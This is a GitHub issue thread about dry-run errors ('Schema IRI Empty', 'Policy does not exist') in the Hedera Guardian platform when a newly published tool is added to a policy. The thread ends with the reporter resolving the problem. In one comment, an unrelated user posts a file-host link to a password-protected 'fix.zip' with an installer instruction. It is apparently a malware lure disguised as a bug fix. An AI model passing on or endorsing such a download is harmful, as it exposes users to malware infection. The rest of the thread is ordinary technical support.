### ISSUE TITLE
"500 Other Error: Schema IRI Empty" and "Policy does not exist" During Dry-Run of Policy with Newly Created Tool

### ISSUE THREAD

**Issue by erikamoji** [hashgraph/guardian#4094]
### Problem description
When attempting a dry-run of a policy that incorporates a newly created and published tool, we are encountering the following errors:

- 500 Other Error: Schema IRI Empty
- Policy does not exist

These errors appear after the tool is published and included in the policy configuration. There is no further context provided by the error message, and we are unable to proceed with the dry-run under these conditions.

### Step to reproduce

1. Create a new tool within the MGS platform.
2. Publish the tool.
3. Add the newly created tool to a policy.
4. Attempt to run a dry-run of the policy with the tool included.
5. Observe the error messages.

### Expected behavior
The dry-run should execute successfully without error when a valid, published tool is included in the policy.

### Troubleshooting Steps Taken:

- Validated the policy with and without the newly created tools; both cases showed no validation issues.
- Successfully performed a dry-run without the tools.
- Successfully ran a dry-run using tools imported via open-source (e.g., CDM Tool 01).
- Ensured our configuration inside the UI matches other tools, aside from naming conventions and schemas.

### Additional Information:

- There appears to be no existing documentation on Schema IRIs.
- We have attached the problematic tools for review (in email sent directly to MGS team @anvabr @prernaadev01)
- If there is any additional information needed, please let us know. 

### Screenshots
![Screenshot 2024-08-29 031406](https://github.com/user-attachments/assets/308cc3a9-edad-4812-9c40-0d96c59c1a5e)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by erikamoji** [comment]
@anvabr thanks for looking into the issue. the tool was published via the UI, within the tool dashboard using the publish button.

![Screenshot 2024-09-03 070626](https://github.com/user-attachments/assets/7f84d15a-c426-418e-9d71-ab5e9bf41e5d)

**Comment by erikamoji** [comment]
@anvabr My partner attached the Tool files in our email to you and @prernaadev01 (29 August). Please let us know if you need us to send it again.

**Comment by prernaadev01** [comment]
@erikamoji Thank you so much for the info. We are looking at it. Will keep you posted.

**Comment by erikamoji** [comment]
@prernaadev01 We just attempted to import the tool via IPFS multiple times on different machines. The import timed out and we received a 504 Error
![Screenshot 2024-09-09 083654](https://github.com/user-attachments/assets/c4df2c50-af59-4740-a6f8-7a4eca0f8001)

**Comment by erikamoji** [comment]
@prernaadev01 We successfully imported the tool, added it to the policy and ran it in Dry Run mode. Unfortunately, we are getting the same errors. Attached is a video of our process and as you can see, it is the correct tool with message ID 1725636668.046506812


Uploading Recording 2024-09-09 085244.mp4…

**Comment by prernaadev01** [comment]
@kirill-tolochko Can you please check this video once

**Comment by prernaadev01** [comment]
@erikamoji Thank you so much for the video. Looks like you are trying to switch from Tool 01 to Tool 4 in policy configurator. But we would suggest you to please update the tool while importing the policy as shown below. Please update the Tool 4 message ID in the field shown in the below image. 

![image](https://github.com/user-attachments/assets/93ab192b-c22f-47ab-864a-ebb4236d9f0f)

**Comment by erikamoji** [comment]
@prernaadev01 I import the Tool from the sidebar by dragging it into the policy. When I drag a Tool from the sidebar, it automatically renames the Tool, regardless of which one I select. I have attached a video demonstrating this behavior.

To ensure I am following the correct process, I would appreciate a detailed video tutorial on how to import Tools using your preferred method. This should include steps from initial selection to loading the Tool into Dry Run after clicking "Go."

I am unable to locate the specific reference you are making in the provided image

https://github.com/user-attachments/assets/d6dc0162-91cc-4fa0-9b5f-43e56022448a

**Comment by prernaadev01** [comment]
Hi, can you please check this link for Tools documentation: https://docs.hedera.com/guardian/guardian/standard-registry/policies/tools/tools-using-ui#id-1.6-changing-tools


Prernaa Agarwal

Technical Product Owner | Envision Blockchain Solutions

Mobile Phone: 626-327-3140

Email: ***@***.******@***.***>

Website: www.envisionblockchain.com<http://www.envisionblockchain.com/>


[cid:97e66ecb-500f-4c75-b5c6-f7d536fc872f]
________________________________

**Comment by prernaadev01** [comment]
@erikamoji Please check this once:
![chrome_jo5xJhDIFA](https://github.com/user-attachments/assets/6b568e13-fd20-42f4-b60e-b9e5c27f9744)

**Comment by erikamoji** [comment]
@prernaadev01 Thanks! I'll check it out and get back to you!

**Comment by erikamoji** [comment]
@prernaadev01 

Thank you for your assistance so far. We wanted to provide an update regarding the issue we're experiencing with the policy Dry Run.

We found that exporting the entire VM0003 policy with the tools, then importing them back, allowed the Dry Run to work. The error only occurs when we work within the initially created policy where tools are published and imported, but a Dry Run is attempted without exporting and re-importing the policy.

Additionally, we are encountering an integration error specifically with AR Tool 03 and AR Tool 04, despite them being formatted similarly to CDM Tool 01. Could you review and provide guidance on this?

Here are a few specifics:

- The Dry Run produces a PPD only when using Tool 01.
- We have tried importing each tool individually and running the Dry Run after each import. The spinning loader issue occurs only with AR Tool 03 and AR Tool 04, even when using the version provided by MGS with message ID 1725636668.046506812.
- This issue arises regardless of whether the tool has a calculation within the schema.

Could the MGS team test a Dry Run on their end where a PPD is attempted to be created? Alternatively, could you check AR Tools 03 and 04 to provide guidance on this?

We have reviewed all available documentation for Tools, including the demo video, but unfortunately, it does not cover this specific issue.

For convenience, we have attached the policy again (in an email) with the tools for your review.

Thank you for your continued support, and we look forward to your guidance.

**Comment by prernaadev01** [comment]
@erikamoji Thank you so much for the policy file and specifics. We are looking at it and will get back to you asap.

**Comment by erikamoji** [comment]
@prernaadev01 Thank you for your help with the issues related to the tools so far. We have resolved the issue with AR Tool 04 and are currently working on AR Tool 03. We’ll reach out if we encounter any further issues with Tool 03.

**Comment by erikamoji** [comment]
@prernaadev01 @anvabr thank you so much for your help thus far. we have actually managed to figure out the issue, but we appreciate all the assistance you've given us. i'm closing this bug issue :)
